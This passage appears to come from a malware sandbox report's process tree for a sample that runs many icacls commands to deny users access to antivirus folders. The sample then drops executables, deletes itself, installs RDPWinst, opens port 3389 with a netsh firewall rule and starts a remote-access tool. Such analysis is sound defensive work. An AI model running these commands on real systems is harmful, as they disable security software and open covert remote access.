                                                                                                                                                              • Modifies file permissions
                                                                                                                                                              PID:3472
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1832
                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
                                                                                                                                                                3⤵
                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                PID:1932
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2232
                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                  icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                  PID:1476
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3904
                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                    icacls c:\programdata\Malwarebytes /deny Admin:(F)
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                    PID:2020
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2588
                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                      PID:2984
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2960
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls C:\Programdata\MB3Install /deny Admin:(F)
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:3980
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:3280
                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                          icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                          PID:808
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3356
                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                            icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                            PID:1284
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4000
                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                              icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                              PID:3308
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1448
                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                PID:1956
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1760
                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                  icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                  PID:3480
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:2908
                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                    PID:2156
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3248
                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                      icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                      PID:2172
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2404
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:1336
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2152
                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                          icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:3524
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:3916
                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                            icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                            PID:1384
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2220
                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                              icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                              PID:2200
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4132
                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                PID:4188
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4216
                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                  PID:4260
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4280
                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                    PID:4360
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4420
                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                      icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:4464
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4512
                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                        icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                        PID:4556
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4576
                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                          icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                          PID:4620
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4656
                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                            icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                            PID:4748
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4776
                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                              icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:4820
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4840
                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:4884
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4904
                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                  icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                  PID:4948
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4968
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:5012
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5064
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                      PID:4312
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4292
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                        PID:4452
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:4604
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                          icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                          PID:4700
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:4724
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                            icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                            PID:4808
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:4788
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                              icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                              PID:4864
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:4920
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                PID:4924
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:5020
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                  icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                  PID:4980
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:5048
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:5100
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:4112
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                      icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                      PID:4108
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:4124
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                        icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                        PID:4144
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:4264
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                          icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                          PID:4296
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:3584
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                            icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            PID:4444
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4368
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                              icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                              PID:4472
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:4552
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                PID:4580
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4600
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                  icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                  PID:4544
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:4800
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                    PID:4784
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:4848
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                      icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                      PID:4940
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:4928
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                        PID:5072
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:4104
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:4416
                                                                                                                                                                                                                                                      • C:\Programdata\Install\utorrent.exe
                                                                                                                                                                                                                                                        C:\Programdata\Install\utorrent.exe
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                        • NTFS ADS
                                                                                                                                                                                                                                                        PID:2940
                                                                                                                                                                                                                                                        • C:\ProgramData\WindowsTask\azur.exe
                                                                                                                                                                                                                                                          C:\ProgramData\WindowsTask\azur.exe
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                          PID:4212
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:4404
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\timeout.exe 3
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                PID:5088
                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\system.exe
                                                                                                                                                                                                                                                            C:\ProgramData\WindowsTask\system.exe
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                            PID:4988
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\selfDel.bat" "
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:2660
                                                                                                                                                                                                                                                            • C:\ProgramData\RDPWinst.exe
                                                                                                                                                                                                                                                              C:\ProgramData\RDPWinst.exe -u
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              PID:4468
                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                                                                                                                                                netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:5024
                                                                                                                                                                                                                                                              • C:\ProgramData\RDPWinst.exe
                                                                                                                                                                                                                                                                C:\ProgramData\RDPWinst.exe -i
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Modifies WinLogon
                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                PID:4836
                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                                                                                                                                                  netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:5108
                                                                                                                                                                                                                                                            • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                              C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                              1⤵
